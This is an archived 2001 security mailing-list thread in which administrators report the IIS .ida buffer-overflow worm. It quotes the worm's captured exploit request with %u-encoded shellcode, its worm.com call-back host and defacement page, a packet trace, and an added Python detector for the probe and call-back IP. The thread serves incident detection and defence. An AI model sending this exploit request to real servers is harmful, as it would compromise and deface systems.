Scott,

Check out Richard Bejtlich's posting to this list from Sunday. For your convenience I'm including it here. Looks like the new IIS worm. I've been tracking it on my IDS and reporting it since Sunday 07/15. After I figured out what to look for I went back through my logs and found the first worm hit (http scan traffic) at 08:54:30 EDT on 07/13 from 202.192.168.145, followed within 15 minutes by additional scans from 210.77.157.171, 202.204.193.2 and 210.68.172.1. So far (as of about 8 hours ago) I logged the http scan from 8122 unique - assumedly compromised - hosts since the first hit on 07/13. In the absence of any advisories about this activity many admins are incredulous when I report it to them. But I have received response from a number of sites (20-30) confirming the IIS compromise.

Regards
Ken

Ken Eichman                    Senior Security Engineer
Chemical Abstracts Service     Tel: (614) 447-3838 ext 3230
2540 Olentangy River Road      Fax: (614) 447-3855
Columbus, OH 43210             Email: keichmanat_private

=======================================================================
Forwarded mail follows:

Date: Sun, 15 Jul 2001 16:25:42 -0500
From: Richard Bejtlich <richardat_private>
Reply-To: richardat_private
Organization: TaoSecurity.com
Subject: IIS .ida exploit involving worm.com / 181.com / 216.99.52.100

Friends in the security world,

I have recently observed multiple exploit attempts related to the "Microsoft Index Server and Indexing Service ISAPI Extension Buffer Overflow Vulnerability" described here:

http://www.securityfocus.com/frames/?content=/vdb/bottom.html%3Fvid%3D2880

It looks like successful execution of an exploit in the wild may result in the compromised machine making a connection to www.worm.com to report its status (216.99.52.100, also aliased as 181.com and chinga.com; note chinga.com also has an address of 209.81.7.23). Below is the signature of the exploit.
I edited sections marked XXcensoredXX to preserve my privacy:

GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Content-type: text/xml
HOST:www.worm.com
Accept: */*
Content-length: 3569

GET ? HTTP/1.0
Content-type: text/xml
HOST:www.worm.com
Accept: */*
Content-length: 3569
c:\notwormLMTH
<html><head><meta http-equiv="Content-Type" content="text/html; charset=english"><title>HELLO!</title></head><bady><hr size=5><font color="red"><p align="center">Welcome to http://www.worm.com !<br><br>Hacked By Chinese!</font></hr></bady></html>
HTTP/1.0 200
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 90
<TITLE>Error</TITLE>
<BODY>
<H1>Error</H1>
XXcensoredXX: Unknown WWW server.</BODY>
-----
Curious about www.worm.com, I connected to port 80 on the box and found this:

telnet www.worm.com 80
Trying 216.99.52.100...
Connected to chinga.com (216.99.52.100).
Escape character is '^]'.
<HTML>
<HEAD>
<META HTTP-EQUIV="REFRESH" CONTENT="0.01; URL=http://www.goto.com/d/home/p/nettcorp/lander/srchindex.jhtml">
<TITLE> Nett Corp </TITLE>
</HEAD>
<blockquote><!-- dlogphp activated, unique hit site is 181.com. IP is XXcensored, but it was my IP addressXX. Broswer is --> </blockquote>
</BODY>
</HTML>
Connection closed by foreign host.
-----
You can see in the 'dlogphp activated' section that my IP address appears to have been logged. (I removed the actual IP address.) I suggest that readers check their logs for connections to 216.99.52.100 (www.worm.com), as outbound connections MAY indicate a compromised host.

I am not a Windows expert and cannot validate the exploit as recorded in my logs, but I believe you may find this warning useful.

Sincerely,

Richard Bejtlich
http://bejtlich.net

=======================================================
================ Your original message: ===============
Date: Tue, 17 Jul 2001 19:37:57 +0100
From: Scott Nursten <scott.nurstenat_private>
MIME-Version: 1.0
To: incidentsat_private
Subject: Re: Strange web traffic

Sorry guys, on my way home, trying to rush out the door .... but before I go, I noticed this - I overlooked it earlier as I'm in quite a hurry.
Having analysed it a bit better now (and actually getting a single stream as opposed to several thousand), you see this:

19:15:37.873583 217.86.214.81.4037 > 194.130.109.164.80: S [tcp sum ok] 3804761538:3804761538(0) win 8760 <mss 1460,nop,nop,sackOK> (DF) (ttl 116, id 49118, len 48)
19:15:37.873625 194.130.109.164.80 > 217.86.214.81.4037: S [tcp sum ok] 79900976:79900976(0) ack 3804761539 win 5840 <mss 1460,nop,nop,sackOK> (DF) (ttl 64, id 0, len 48)
19:15:38.200238 217.86.214.81.4037 > 194.130.109.164.80: . [tcp sum ok] 1:1(0) ack 1 win 8760 (DF) (ttl 116, id 49162, len 40)
19:15:38.202867 217.86.214.81.4037 > 194.130.109.164.80: P [tcp sum ok] 1:5(4) ack 1 win 8760 (DF) (ttl 116, id 49163, len 44)
19:15:38.203063 194.130.109.164.80 > 217.86.214.81.4037: . [tcp sum ok] 1:1(0) ack 5 win 5840 (DF) (ttl 64, id 15641, len 40)
19:15:38.404751 217.86.214.81.4037 > 194.130.109.164.80: P [tcp sum ok] 5:1465(1460) ack 1 win 8760 (DF) (ttl 116, id 49164, len 1500)
19:15:38.404825 194.130.109.164.80 > 217.86.214.81.4037: . [tcp sum ok] 1:1(0) ack 1465 win 8760 (DF) (ttl 64, id 15642, len 40)
19:15:38.405121 194.130.109.164.80 > 217.86.214.81.4037: P [tcp sum ok] 1:500(499) ack 1465 win 8760 (DF) (ttl 64, id 15643, len 539)
19:15:38.405193 194.130.109.164.80 > 217.86.214.81.4037: F [tcp sum ok] 500:500(0) ack 1465 win 8760 (DF) (ttl 64, id 15644, len 40)
19:15:38.950063 217.86.214.81.4037 > 194.130.109.164.80: . [tcp sum ok] 1465:2925(1460) ack 1 win 8760 (DF) (ttl 116, id 49212, len 1500)
19:15:38.986071 194.130.109.164.80 > 217.86.214.81.4037: . [tcp sum ok] 501:501(0) ack 2925 win 11680 (DF) (ttl 64, id 15645, len 40)

Then the packet below. I caught the one below first for obvious reasons: "Hacked By Chinese". :) That's pretty much the whole stream (bar the bye-byes). HTH some more.
Rgds,

Scott

Scott Nursten - Systems Administrator
----------------------------------------------
ddi: +44 (0) 1293 744 122
work: +44 (0) 1293 402 040
fax: +44 (0) 1293 402 050
email: scottnat_private
wwweb: http://www.streetsonline.co.uk
----------------------------------------------
"Without order nothing can exist - without chaos nothing can evolve."

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
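A defender-side check covering both Bejtlich's signature and Scott's capture, added here as an example and not code from either post: it matches the /default.ida probe in web-server log lines and flags hosts seen opening TCP/80 to 216.99.52.100 (www.worm.com). The log lines and flow records are constructed; the 100-N minimum, the common log format and the "src dst port" record shape are assumptions.

```python
"""Log-side detection for the .ida probe and the worm.com call-back described
in this thread. Added example, not code from the original posts."""
import re
from typing import Dict, Iterable, List

# Request line from the posted signature: /default.ida? followed by a long run
# of 'N' filler, %u-encoded payload words and a trailing "=a". The minimum of
# 100 N's is an assumption, chosen so ordinary .ida requests do not match.
IDA_PROBE = re.compile(
    r"^GET /default\.ida\?N{100,}(?:%u[0-9a-fA-F]{2,4})+=a HTTP/1\.[01]$"
)

# Call-back destination named in Bejtlich's post (www.worm.com).
WORM_CALLBACK_IP = "216.99.52.100"

# Apache common log format: client ident user [time] "request" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+)')


def is_ida_probe(request_line: str) -> bool:
    """True when an HTTP request line matches the worm's .ida probe."""
    return IDA_PROBE.match(request_line) is not None


def scan_web_log(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return one record per CLF log line that carries the .ida probe."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a CLF line: skip rather than guess at its shape
        client, when, request, status, _ = m.groups()
        if is_ida_probe(request):
            hits.append({"client": client, "time": when, "status": status})
    return hits


def scan_connections(records: Iterable[str]) -> List[str]:
    """Flag local sources that opened TCP/80 to the worm.com address.

    Each record is a constructed 'src_ip dst_ip dst_port' triple, the shape a
    firewall or flow log can be reduced to; an outbound hit marks a host to
    inspect for the IIS compromise, not proof of it."""
    suspects = []
    for rec in records:
        src, dst, dport = rec.split()
        if dst == WORM_CALLBACK_IP and dport == "80":
            suspects.append(src)
    return suspects


# Constructed sample input. The request mirrors the posted signature (a run of
# 224 N's followed by the same %u sequence); the client addresses are made up.
PROBE = ("GET /default.ida?" + "N" * 224
         + "%u9090%u6858%ucbd3%u7801" * 3
         + "%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a"
         + " HTTP/1.0")
SAMPLE_LOG = [
    '217.86.214.81 - - [17/Jul/2001:19:15:38 +0100] "' + PROBE + '" 400 499',
    '10.0.0.5 - - [17/Jul/2001:19:16:02 +0100] "GET /index.html HTTP/1.0" 200 2048',
    '10.0.0.6 - - [17/Jul/2001:19:16:10 +0100] "GET /default.ida?q=1 HTTP/1.0" 200 120',
]
SAMPLE_FLOWS = ["10.0.0.7 216.99.52.100 80", "10.0.0.8 192.0.2.10 80"]

if __name__ == "__main__":
    for hit in scan_web_log(SAMPLE_LOG):
        print("ida probe from", hit["client"], "at", hit["time"])
    for host in scan_connections(SAMPLE_FLOWS):
        print("possible worm.com call-back from", host)
```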
This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 14:00:42 PDT